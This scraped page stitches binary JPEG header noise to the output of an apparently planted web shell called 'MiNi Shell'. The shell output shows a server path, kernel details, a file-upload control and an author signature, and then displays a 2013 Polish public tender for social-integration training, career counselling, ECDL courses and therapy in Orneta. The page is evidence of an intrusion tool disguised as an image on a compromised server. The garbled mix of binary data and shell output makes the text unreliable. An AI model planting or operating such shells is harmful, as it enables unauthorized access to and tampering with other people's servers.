JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/170418-N-2013.html

<p class="kh_header"><b>Orneta: Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Szansa na lepszą przyszłość.</b><br>
<b>Numer ogłoszenia: 170418 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Lidzbarku Warmińskim z/s w Ornecie , ul. Dworcowa 4, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 55 242 43 58, 55 242 43 59, faks 55 242 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcprorneta.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Szansa na lepszą przyszłość..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie następujących kursów/szkoleń/warsztatów: Część I Trening komunikacji interpersonalnej, trening motywacyjny oraz trening kompetencji i umiejętności społecznych.Trening komunikacji interpersonalnej z elementami treningu asertywności. Działania dla 2 grup: 5 osób dorosłych niepełnosprawnych i 6 osób młodzież w wieku od 15 do 30 lat.
Cel: 3 dniowy wyjazdowy trening komunikacji interpersonalnej z elementami asertywności, celem nabycia umiejętności nawiązywania partnerskich kontaktów społecznych, doskonalenia kompetencji komunikacyjnych, konstruktywnego radzenia sobie ze zjawiskami stygmatyzacji społecznej. Program i metody treningu: trening komunikacji obejmował  będzie łącznie 30 godzin dydaktycznych dla dwóch grup. Zajęcia odbędą się w planowanych terminach: grupa 5 osób dorosłych niepełnosprawnych - lipiec 2013 r. (3 dni 15 godzin dydaktycznych), grupa 6 osób - młodzież w wieku od 15 do 30 lat - sierpień 2013 r. (3 dni 15 godzin dydaktycznych)
Metody pracy w ramach treningu: zajęcia warsztatowe realizowane w oparciu o ogólne zasady pracy, metody aktywizujące i tradycyjne (modelowanie, wykład, prelekcja), ćwiczenia wdrażające nowe umiejętności i zdobytą wiedzę, psychodramy,
panele dyskusyjne, omówienie i wyciąganie wniosków ułatwiających wykorzystanie nabytych doświadczeń w praktycznym działaniu. Tematyka zajęć:zapoznanie i integracja grupy, ukazanie równości szans, psychologiczne mechanizmy spostrzegania społecznego, umiejętność aktywnego słuchania i przekazywania komunikatów, postawa asertywna względem siebie i innych, język /JA/ w konstruktywnym wyrażaniu własnych poglądów, uczuć, potrzeb i oczekiwań, konstruktywne reagowanie w sytuacji stygmatyzacji i dyskryminacji społecznej. Produkty:Uczestnicy otrzymają zaświadczenie potwierdzające ukończenie treningu. Wykonawca zorganizuje miejsce szkolenia na terenie województwa warmińsko - mazurskiego, zapewni dojazd do miejsca szkolenia oraz powrót, ubezpieczenie NW uczestników, zakwaterowanie wraz z wyżywieniem oraz usługę szkoleniową. Trening motywacyjny. Działanie dla grupy: 7 osób młodzież w wieku od 15 do 30 lat. Cel: Trening motywacyjny celem doskonalenia wiedzy i umiejętności w zakresie motywowania siebie do działania i świadomego sterowania własnym potencjałem. Program i metody treningu: Zajęcia odbędą się  jako cykl 3 spotkań w łącznym wymiarze 21 godzin dydaktycznych, w planowanym terminie: maj 2013 r.
Metody pracy w ramach treningu: zajęcia warsztatowe realizowane w oparciu o ogólne zasady pracy,metody aktywizujące i tradycyjne (modelowanie, wykład, prelekcja), ćwiczenia wdrażające nowe umiejętności i zdobytą wiedzę, psychodramy,
panele dyskusyjne, omówienie i wyciąganie wniosków ułatwiających wykorzystanie nabytych doświadczeń w praktycznym działaniu. Tematyka zajęć: poznawanie i rozwijanie własnego potencjału, zapobieganie wyuczonej bezradności i bezdecyzyjności, identyfikacja własnych ograniczeń i opracowanie potencjalnych sposobów radzenia sobie z nimi, intensywna aktywizacja osobista i społeczna,
wzbudzanie zaangażowania i kształtowanie poczucia samoskutecznosci w działaniu.
Produkty: Uczestnicy otrzymają zaświadczenie potwierdzające ukończenie treningu. Wykonawca zapewni usługę szkoleniową i catering podczas zajęć. Miejsce szkolenia: Orneta, salę zapewni zamawiający. Trening kompetencji i umiejętności społecznych. Działania dla 5 osób dorosłych niepełnosprawnych: Cel: wzmocnienie pozytywnej samooceny i postawy pro aktywnej, umiejętności radzenia sobie z kryzysami wewnętrznymi. Program: Zajęcia odbędą się jako cykl 3 spotkań w łącznym wymiarze 21 godzin dydaktycznych, w planowanym terminie: maj 2013 r. Metody pracy w ramach treningu: zajęcia warsztatowe realizowane w oparciu o ogólne zasady pracy, metody aktywizujące i tradycyjne (modelowanie, wykład, prelekcja),ćwiczenia wdrażające nowe umiejętności i zdobytą wiedzę, psychodramy,
panele dyskusyjne, omówienie i wyciąganie wniosków ułatwiających wykorzystanie nabytych doświadczeń w praktycznym działaniu. Tematyka zajęć: konfrontacja ze sobą : fazy, zjawiska, przełomy; profilaktyka kryzysów życiowych związanych z doświadczaniem niepełnosprawności; poszukiwanie ścieżki rozwoju osobistego, 
aktywne planowanie swojego czasu adekwatne do potrzeb i możliwości; wizaż i autoprezentacja w budowaniu własnego wizerunku; budowanie sieci wsparcia w otoczeniu społecznym. Produkty: Uczestnicy otrzymają zaświadczenie potwierdzające ukończenie treningu. Wykonawca zapewni usługę szkoleniową i catering podczas zajęć. Miejsce szkolenia: Orneta, salę zapewni zamawiający.
Część II: Wsparcie doradcy zawodowego: grupowe poradnictwo edukacyjno -  zawodowe. Wsparcie doradcy zawodowego prowadzone będzie w grupach: 5 osób dorosłych niepełnosprawnych i 6 osób: młodzież w wieku od 15 do 30 lat. Działania dla 5 osób dorosłych niepełnosprawnych: Cel: wzrost wiedzy uczestników na temat możliwości zatrudnienia, wzrost kompetencji w zakresie aktywnego poszukiwania pracy oraz efektywnego promowania siebie w roli pracownika. Program: Zajęcia odbędą się jako cykl 3 spotkań w łącznym wymiarze 20 godzin dydaktycznych, w planowanym terminie: czerwiec 2013 r. Tematyka zajęć: kształtowanie siebie w roli pracownika; informacja zawodowa (regulacje prawne, formy zatrudnienia, prawa i obowiązki pracownicze, wymagania pracodawców); umiejętność poszukiwania ofert i możliwości pracy;sporządzanie dokumentów aplikacyjnych, sztuka autopromocji  i autoprezentacji; przełamywanie barier, uprzedzeń i stereotypów podczas rozmów kwalifikacyjnych; diagnoza własnego potencjału zawodowego (badanie predyspozycji zawodowych); analiza własnych zasobów i deficytów wewnętrznych i zewnętrznych; analiza ofert zatrudnienia pod względem dopasowania własnych umiejętności i kwalifikacji); ukierunkowanie na zawody adresowane do kobiet i mężczyzn; kontakt z wybranym środowiskiem pracy. Produkty: Powstanie 5 CV i listów motywacyjnych, które zostaną stworzone przez uczestników na warsztatach. Uczestnicy otrzymają zaświadczenia potwierdzające ukończenie zajęć. Wykonawca zapewni usługę szkoleniową i catering podczas zajęć. Miejsce szkolenia: Orneta, salę zapewni zamawiający. Działania dla 6 osób: młodzież w wieku od 15 do 30 lat. Cel: Doradztwo celem wzrostu wiedzy i doskonalenia umiejętności pozwalających sprostać wyzwaniom współczesnego rynku pracy, efektywnego zaplanowania drogi edukacyjnej i kariery zawodowej oraz pozwalające na określenie preferencji zawodowych, potencjału i predyspozycji niezbędnych do planowania i modyfikowania ścieżki kariery zawodowej. Program: 6 uczestników odbędzie warsztaty z doradcą zawodowym jako cykl 3 spotkań, w łącznym wymiarze 20 godzin dydaktycznych w planowanym terminie: sierpień 2013 r. Tematyka zajęć: diagnoza i kształtowanie kompetencji kluczowych niezbędnych do dobrego funkcjonowania na rynku pracy; poszukiwanie własnej ścieżki edukacyjno - zawodowej, pogłębienie wiedzy na temat wymagań współczesnego rynku pracy; sporządzanie dokumentów aplikacyjnych; pogłębienie wiedzy w zakresie sposobów poszukiwania informacji o dostępnej ofercie edukacyjnej, budowanie otwartości na zmianę, przełamywanie barier, uprzedzeń i stereotypów podczas rozmów kwalifikacyjnych, kontakt z wybranym środowiskiem pracy, ukierunkowanie na zawody adresowane do kobiet i mężczyzn. Produkty: Powstanie 6 CV i listów motywacyjnych. Uczestnicy otrzymają zaświadczenia potwierdzające ukończenie zajęć. Wykonawca zapewni  usługę szkoleniową i catering podczas zajęć. Miejsce szkolenia: Orneta, salę zapewni zamawiający. Zajęcia z doradcą zawodowym połączone będą wyjazdem studyjnym obu grup (łącznie 11 osób) do podmiotu ekonomii społecznej: przewidywany termin lipiec 2013 r. Wykonawca zorganizuje wyjazd, zapewni dojazd i powrót oraz ubezpieczenie NW uczestników. Część III: Kurs komputerowy ECDL Start. Działania dla 7 osób: młodzież w wieku od 15 do 30 lat. Cel: Kurs komputerowy celem wzrostu wiedzy i doskonalenia umiejętności z zakresu obsługi komputera i Internetu oraz podstawowych programów komputerowych. Program: Zajęcia odbędą się jako cykl 16 spotkań w łącznym wymiarze 84 godzin dydaktycznych w planowanym terminie: od maja do października 2013 r. Tematyka kursu powinna obejmować zajęcia teoretyczne i zajęcia praktyczne. Każdy z czterech modułów kursu komputerowego zakończy się egzaminem.Tematyka zajęć: Moduł 1: podstawy technik informatycznych i komunikacyjnych; Moduł 2: użytkowanie komputerów; Moduł 3: przetwarzanie tekstów; Moduł 4: bazy danych. Produkty: Uczestnicy otrzymają  certyfikat  potwierdzający ukończenie kursu komputerowego ECDL Start. Wykonawca zapewni usługę szkoleniową i catering podczas zajęć, niezbędny sprzęt komputerowy, materiały dydaktyczne dla uczestników kursu. Wykonawca zobowiązany jest do przeprowadzenia egzaminów z kursu komputerowego ECDL Start: w miejscu szkolenia. Miejsce szkolenia: Orneta, salę zapewni zamawiający.
Działania dla 5 osób dorosłych niepełnosprawnych. Cel: Kurs komputerowy, celem nabycia wiedzy i doskonalenia umiejętności z zakresu obsługi komputera i Internetu, podstawowych programów komputerowych przydatnych do wykonywania pracy zawodowej. Program: Zajęcia odbędą się jako cykl 16 spotkań w łącznym wymiarze 84 godzin dydaktycznych w planowanym terminie: od maja do października 2013 r. Tematyka kursu powinna obejmować zajęcia teoretyczne i zajęcia praktyczne. Każdy z czterech modułów kursu komputerowego zakończy się egzaminem. Tematyka zajęć:
Moduł 1: podstawy technik informatycznych i komunikacyjnych; Moduł 2: użytkowanie komputerów; Moduł 3: przetwarzanie tekstów; Moduł 4: grafika menadżerska i prezentacyjna. Produkty: Uczestnicy otrzymają certyfikat  potwierdzający ukończenie kursu komputerowego ECDL Start. Wykonawca zapewni usługę szkoleniową i catering podczas zajęć, niezbędny sprzęt komputerowy, materiały dydaktyczne dla uczestników kursu. Wykonawca zobowiązany jest do przeprowadzenia egzaminów z kursu komputerowego ECDL Start: w miejscu szkolenia.
Miejsce szkolenia: Orneta, salę zapewni zamawiający. Część IV: Indywidualna terapia psychologiczna, psychospołeczna lub rodzinna. Działania dla 2 grup: 5 osób dorosłych niepełnosprawnych i 6 osób: młodzież w wieku od 15 do 30 lat. Cel: wzrost samodzielności w radzeniu sobie z osobistymi trudnościami sytuacyjnymi i rozwojowymi. Program: Indywidualna terapia dla 11 osób w planowanym terminie od listopada do grudnia 2013 r., w wymiarze 3 godzin dydaktycznych  na osobę (łącznie 33 godziny dydaktyczne). Tematyka zajęć: zidentyfikowanie i omówienie problemu z beneficjentem, wspólne poszukiwanie rozwiązań, planowanie działań i wzmocnienie motywacji beneficjenta do ich podjęcia, wspierania beneficjenta w realizacji pierwszych kroków ku zmianie. Wykonawca zapewnia ww. usługę. Miejsce szkolenia:Orneta, salę zapewnia zamawiający. Wykonawca w ramach zamówienia zobowiązany będzie tam gdzie jest to niezbędne:
-zapewnić sprzęt szkoleniowy (rzutnik, laptop, tablica, projektor i ekran),
-zapewnić catering podczas zajęć, tj. w tym co najmniej kawa/herbata dostępne podczas każdej z przerw, ciastka (mieszanka deserowa - delicje, wafelki, ciastka kruche): 15 dkg różnych ciastek na 1 osobę, oraz jeden ciepły posiłek składający się 
z co najmniej drugiego dania (gramatura min. 500 g); ponadto 1 x 0,33 l wody mineralnej niegazowanej - 1 osobę, 1 x 0,33 l wody mineralnej gazowanej - 1 osobę, cukier podany w cukiernicy, mleko płynne 2%, cytryny. Sposób podania - estetycznie, w formie stołu szwedzkiego z zapewnieniem filiżanek, talerzyków, szklanek, łyżeczek i serwetek w czasie trwania szkolenia. Posiłki powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny wygląd. Wykonawca przy oferowaniu obiadów uwzględniać będzie świeże produkty. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia,
- zapewnić kadrę posiadającą wymagane wykształcenie, kwalifikacje i doświadczenie zawodowe, -oznaczyć sale szkoleniowe oraz dokumenty związane z realizacją zamówienia w sposób zgodny z dokumentem: Wytyczne w zakresie oznaczania projektów PO KL dostępnym na stronie www.efs.gov.pl, -sporządzania imiennej i oznaczonej zgodnie z wytycznymi listy obecności na każdych zajęciach,-prowadzenia Dziennika zajęć, -dokonania ewaluacji szkoleń/warsztatów w zakresie zdobycia przez Uczestników oczekiwanych kwalifikacji i umiejętności, -przedstawienia Zamawiającemu list obecności, Dzienników zajęć oraz Raportu końcowego potwierdzającego osiągnięcie zakładanych wskaźników, -współpracy z Zamawiającym w zakresie ustalania dokładnego harmonogramu zajęć, -wydania każdemu z Uczestników kończącemu szkolenie/kurs/warsztat imiennego zaświadczenia /certyfikatu/świadectwa potwierdzającego zdobyte kwalifikacje i umiejętności, -zapewnić możliwość stałego, bezpośredniego kontaktu z zamawiającym, w tym informować Zamawiającego na bieżąco o harmonogramie zajęć oraz umożliwić mu przeprowadzenie wizyt monitorujących w miejscu realizacji zamówienia, -ubezpieczyć skierowane osoby od następstw nieszczęśliwych wypadków powstałych w drodze do i z miejsca szkolenia, -zapewnić warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy w trakcie szkolenia. Dodatkowe informacje dotyczące zajęć: -łączny czas zajęć w ciągu jednego dnia nie może przekroczyć 8 godzin szkoleniowych, -1 godzina szkoleniowa odpowiada 1 godzinie lekcyjnej, tj. 45 minut. Ponadto Wykonawca zobowiązuje się do realizacji zamówienia w sposób zgodny z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych oraz w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024) i co za tym idzie przetwarzać dane osobowe Uczestników tylko i wyłącznie w celu realizacji niniejszego zamówienia. Po stronie Zamawiającego leży: -rekrutacja Uczestników, -przekazanie ich listy Wykonawcy, -odbiór prac, -zapewnienie miejsca do przeprowadzenia szkolenia/warsztatów w Ornecie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje i/lub będzie dysponował osobami, które będą odpowiedzialne za świadczenie usług czyli: Część 1 : co najmniej jedna osoba: posiadająca wykształcenie wyższe psychologiczne lub pedagogiczne; posiadająca co najmniej trzyletnie doświadczenie (w czasie ostatnich 5 lat) w pracy w zawodzie psychologa lub pedagoga; świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą. Część 2: co najmniej jedna osoba: posiadająca wykształcenie wyższe; będąca doradcą zawodowym; posiadająca co najmniej trzyletnie doświadczenie (w czasie ostatnich 5 lat) w zawodzie doradcy zawodowego; świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą. Część 3: co najmniej jedna osoba: posiadająca wykształcenie wyższe informatyczne; posiadająca co najmniej trzyletnie (w czasie ostatnich 5 lat) doświadczenie w pracy w zawodzie informatyka; świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą; co najmniej jedna osoba posiadająca uprawnienia do egzaminowania i certyfikowania uczestników kursu w standardzie ECDL. Część 4: co najmniej jedna osoba: posiadająca wykształcenie wyższe psychologiczne; posiadająca uprawnienia do prowadzenia indywidualnej terapii psychologicznej, psychospołecznej i rodzinnej; posiadająca co najmniej pięcioletnie (w czasie ostatnich 7 lat) doświadczenie w zawodzie psychologa/terapeuty; świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach: osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu; zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy; w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania ilości osób biorących udział w poszczególnych kursach/szkoleniach warsztatach mogą ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną część/ilość uczestników przewidzianych SIWZ * ilość Uczestników biorących udział w zajęciach).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcprorneta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PCPR w Lidzbarku Warmińskim z siedzibą w Ornecie, 11-130 Orneta, ul. Dworcowa 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2013 godzina 12:00, miejsce: PCPR w Lidzbarku Warmińskim z siedzibą w Ornecie, 11-130 Orneta, ul. Dworcowa 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com